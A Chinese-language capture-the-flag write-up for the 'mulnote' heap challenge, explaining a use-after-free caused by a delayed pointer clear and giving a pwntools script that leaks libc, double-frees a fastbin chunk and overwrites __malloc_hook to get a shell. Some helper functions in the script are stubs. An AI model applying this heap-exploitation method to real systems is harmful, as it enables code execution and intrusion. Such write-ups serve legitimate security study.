登录后台

页面导航

本文编写于 436 天前,最后修改于 118 天前,其中某些信息可能已经过时。

程序分析

先check一下

    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
Welcome to mulnote:
[C]reate
[E]dit
[R]emove
[S]how
[Q]uit
>

ida分析伪代码的时候在delete里面发现了sleep
sleep了10秒,相当于没有清空指针,存在uaf漏洞

void *__fastcall start_routine(void *a1)
{
  free((void *)qword_202020[(_QWORD)a1]);
  sleep(0xAu);
  qword_202020[(_QWORD)a1] = 0LL;
  return 0LL;
}

利用思路

1.unsorted bin leak出libc地址
2.double free拿malloc_hook

from pwn import *

DEBUG=0
recv_banner = ">"
if DEBUG:
    r = process("./mulnote")
    print pidof(r)
    one_gadget = 0x4647c
    libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
    arena_off = 0x3C2760
else:
    r = process("./mulnote")
    arena_off = 0x3C4B20
    one_gadget =  0x4526a
    libc = ELF("./libc.so")

def menu(op):
    r.sendlineafter(recv_banner,str(op))

def edit(idx,content,size=False):
    menu("E")

def add(size,content):
    menu("C")
    r.recv()
    r.sendline(str(size))
    r.recv()
    r.send(str(content))
    
def delete(idx):
    menu("R")
    r.recv()
    r.sendline(str(idx))
def show(idx):
    menu("S")
    #r.sendline(str(idx))

add(0xf8,'a')
add(0x60,'a')
add(0x60,'a')
add(0x10,'a')
delete(0)
show(0)
r.recvuntil("[*]note[0]:\n")
libc_addr = u64(r.recv(6).ljust(8,"\x00"))-88-arena_off
success("libc_addr: " + hex(libc_addr))
one_gadget_addr = libc_addr + one_gadget

add(0xf8,'a')
delete(1)
delete(2)
delete(1)
add(0x60,p64(libc_addr+arena_off-0x20-3))
add(0x60,'a')
add(0x60,'a')
payload = 'a'*3+p64(one_gadget_addr)
add(0x60,payload)

r.recvuntil(">")
r.sendline("C")
r.recv()
r.interactive()